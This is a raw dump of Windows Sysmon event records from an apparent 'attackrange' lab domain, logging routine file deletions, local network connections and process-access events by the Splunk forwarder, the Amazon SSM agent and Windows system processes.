AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49566-false10.0.1.12-8000- 23542300x8000000000000000103993Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:21.261{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E48D215C1F5865C6082638DF929887CB,SHA256=6E450C4173A66147640523F9BE96645C1FF20888CE0F6EA262A1C0BF1095F986,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081850Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:21.260{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081849Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:21.260{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081848Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:21.260{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081853Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:22.713{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D89CEF54F84614E964C6EE35393409F1,SHA256=F171D21A2C0C577CDD54510804317E58A801C905C2D75AFF7F658125D4005227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103995Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:22.261{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB29738817948ECABF3A51BA929CB8AB,SHA256=3491DEFE81AF5F511B376CC24ED44A7AD3F79DD89BC5B57CB28FD905F1BF1FF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081854Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:23.932{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14549DF2F2A9B62C1531767B02B1F2F2,SHA256=42E2C0597C446886D7E002166DEFDE4252EA1FDB8A836B323B8E0AAC813310BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103996Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:23.261{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F332E3B0936D062F85C8A3D6918B5CA,SHA256=E9B5F2D617A7BFF78AF198C7513790C98F4ACFEA2BC21E0B5F399280D5164CD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081855Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:24.963{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4258C12DA4F1D0D8367E4F72970F1BFC,SHA256=E6C0228383F02DFE93805573C6A679A01653B6F889A3AEC9E5348497AC8B9393,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103997Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:24.261{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA921C8974EF65C0880D196A28F93B9C,SHA256=033F735C8709A531550B9DDE33AAB16E0AD72DC3F96AAED9A46B4142B18B96B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103999Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:25.328{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-025MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103998Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:25.263{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C7CF4603E02E2922235503B9C6A047,SHA256=2FAE74879006DD003F4788E5C595B0A4F780A9DE92B513C98C6E1DB8B9133E1E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104002Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:25.438{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49567-false10.0.1.12-8000- 23542300x8000000000000000104001Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:26.328{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-026MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104000Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:26.265{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF878E4827AEC2CB42D33C592FC47425,SHA256=FEA92DECAC700EF8129CB4ADF77FC7249AD330FFAA9F39F2B7F94C8A7882F767,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081856Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:26.073{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A87858788409952A05C4DDC0D8175AD,SHA256=6E223D87A55E33260837B5B4B8AA02B9D9DE5BE2A3C6D01E765FD151645300E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104003Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:27.269{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63C447D270A0292927D067CBE022799B,SHA256=2C1B253E862331839646FA15D9F3ABD50ECE4A755F10E5B69CAFA58FA4D13326,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081858Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:25.766{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50060-false10.0.1.12-8000- 23542300x800000000000000081857Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:27.166{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92DABDB4EE49F5BAE26F39AA834DF655,SHA256=F7BB68ADB0FCF55893FB5ED1475CD9CC415331BA678FFB203321B520180D43D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104004Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:28.269{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF9281F9B417D6B6E9C4A7D44E85F162,SHA256=F499D7F60FBA58657B061A9CFDAFFD0FF87184F72F096CAC1B4BC9C247CE87B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081859Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:28.166{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85019B45FA4637E3D7AD26E6A0DE4876,SHA256=5407695E31306CEC50D8BF673972ADD17AFAEA4D6B111287555251E5042AE6E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104005Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:29.269{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FE8EB9EFACC322978F0ED7D41700E0,SHA256=A72631881C42C3C203AE8EC8DD6413EE0EF4C3AEEC301489D24E4F2923E0F081,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081861Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:29.682{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081860Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:29.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB1FAF1D8E816B4FEFC13CBB42C29743,SHA256=64AC6FDA02A21F131ACE665D7EBB3FDCD07EE215ED39657284D0D4EC78DD8313,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104006Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:30.269{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7544954B3EF4A3818FF90C51DE093C4A,SHA256=B0AB13665C7A554426D0217224AE4F48F88BC844965A379E9A0A17EA369DF1BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081862Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:30.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F753025178F162D4002B371F948402FA,SHA256=485BAE2F5AB5FC41F9806EE2F66D3DC76E7C469DB1D230CFA327A6D907692001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081890Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2FB-615A-5801-00000000FD01}1168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081889Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081888Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081887Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081886Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081885Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081884Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081883Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081882Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081881Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081880Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B2FB-615A-5801-00000000FD01}1168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081879Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.854{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2FB-615A-5801-00000000FD01}1168C:\Program 